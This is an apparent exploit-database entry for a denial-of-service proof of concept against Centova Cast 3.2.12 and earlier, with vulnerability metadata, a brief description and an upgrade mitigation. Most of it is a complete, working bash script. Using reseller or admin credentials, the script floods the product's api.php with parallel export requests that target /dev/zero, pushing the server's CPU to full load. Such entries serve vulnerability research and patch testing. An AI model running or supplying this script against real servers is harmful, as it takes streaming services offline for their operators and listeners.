Centova Cast 3.2.12 - Denial of Service (PoC)

vendor:

Centova Cast

by:

DroidU

7.5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: Centova Cast

Affected Version From: <=v3.2.12

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Debian 9, CentOS 7

2019

Centova Cast 3.2.12 – Denial of Service (PoC)

The Centova Cast becomes out of control and causes 100% CPU load on all cores. A bash script is used to exploit the vulnerability by sending a request to the API with a filename of /dev/zero, which causes the Centova Cast to become out of control and cause 100% CPU load on all cores.

Mitigation:

Upgrade to the latest version of Centova Cast, which is not vulnerable to this exploit.

Source

Exploit-DB raw data:

# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
# Date: 2019-11-18
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.12
# Tested on: Debian 9, CentOS 7
# ===============================================
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.

#!/bin/bash
if [ "$3" = "" ]
then
echo "Usage: $0 centovacast_url reseller/admin password"
exit
fi
url=$1
reseller=$2
pass=$3


dwn() {
echo -n .
curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
}

for i in {0..32}
do
dwn /dev/zero
sleep .1
done
echo "
Done!"